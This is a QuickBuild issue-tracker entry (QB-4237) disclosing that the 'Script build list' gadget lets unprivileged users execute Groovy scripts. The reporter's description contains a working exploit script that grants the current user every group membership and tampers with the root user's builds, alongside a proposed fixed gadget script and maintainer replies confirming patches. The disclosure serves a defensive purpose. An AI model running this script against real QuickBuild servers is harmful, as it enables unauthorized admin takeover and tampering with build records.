| << Back to previous view |
|
[QB-4237] Gadget may execute script by unauthorized users
|
|
| Status: | Resolved |
| Project: | QuickBuild |
| Component/s: | None |
| Affects Version/s: | None |
| Fix Version/s: | 14.0.34 |
| Type: | Bug | Priority: | Critical |
| Reporter: | Nguyen Duc Long | Assigned To: | Robin Shen |
| Resolution: | Fixed | Votes: | 0 |
| Remaining Estimate: | Unknown | Time Spent: | Unknown |
| Original Estimate: | Unknown | ||
| Description |
|
The right to create and execute code is granted in many places. In particular, users do not need any permissions to use the "Script build list" gadget.
Example of a dangerous script use for Script build list. ``` groovy: import com.pmease.quickbuild.Context; import com.pmease.quickbuild.model.Build; import com.pmease.quickbuild.SearchCriteria; import org.hibernate.criterion.Restrictions; import org.hibernate.criterion.Criterion; import org.hibernate.criterion.Order; import com.pmease.quickbuild.entitymanager.BuildManager; import com.pmease.quickbuild.model.Group import com.pmease.quickbuild.entitymanager.GroupManager import com.pmease.quickbuild.model.User import com.pmease.quickbuild.entitymanager.UserManager import com.pmease.quickbuild.model.Membership; import com.pmease.quickbuild.entitymanager.MembershipManager; // --- Hack admin permission --- Collection<Group> groups = GroupManager.instance.getAll() MembershipManager.instance.assign(Context.getUser(), groups, false) // --- End - Hack admin permission --- // --- Hack builds of root user --- User rootUser = UserManager.instance.get(1) Criterion[] criterions = [Restrictions.eq("requester", rootUser)]; Order[] orders = [Order.desc("beginDate")]; def criteria = new SearchCriteria(criterions, orders); def builds = system.buildManager.search(criteria, 0, 10); for(Build build in builds){ build.setVersion("Hacked") BuildManager.instance.save(build); } // --- End - Hack builds of root user --- return new ArrayList<Build>(); ``` With "Script build list" gadget. I suggest editing it to "My build" gadget. It contains a fixed script instead of allowing filling. Example: ``` groovy: import com.pmease.quickbuild.Context; import com.pmease.quickbuild.model.Build; import com.pmease.quickbuild.SearchCriteria; import org.hibernate.criterion.Restrictions; import org.hibernate.criterion.Criterion; import org.hibernate.criterion.Order; if (Context.getUser() != null) { Criterion[] criterions = [Restrictions.eq("requester", Context.getUser())]; Order[] orders = [Order.desc("beginDate")]; def criteria = new SearchCriteria(criterions, orders); return system.buildManager.search(criteria, 0, #limit_setting(default=10)); } else { return new ArrayList<Build>(); } ``` |
| Comments |
| Comment by Robin Shen [ 30/Jan/26 12:56 AM ] |
| Thanks for reporting. This issue has now been addressed in 15.0.40, which only allows executing scripts in gadgets created by trusted user (with script execution permission). Nevertheless, if an user allows to edit configuration setting, they will automatically get permission of execuing script, as configuration setting relies on scripting heavily. |
| Comment by Nguyen Duc Long [ 30/Jan/26 02:46 AM ] |
|
Hello admin,
Can you create another patch for QB14? |
| Comment by Robin Shen [ 30/Jan/26 03:35 AM ] |
|
Patch also available in QB 14.0.34:
https://build.pmease.com/build/6156 |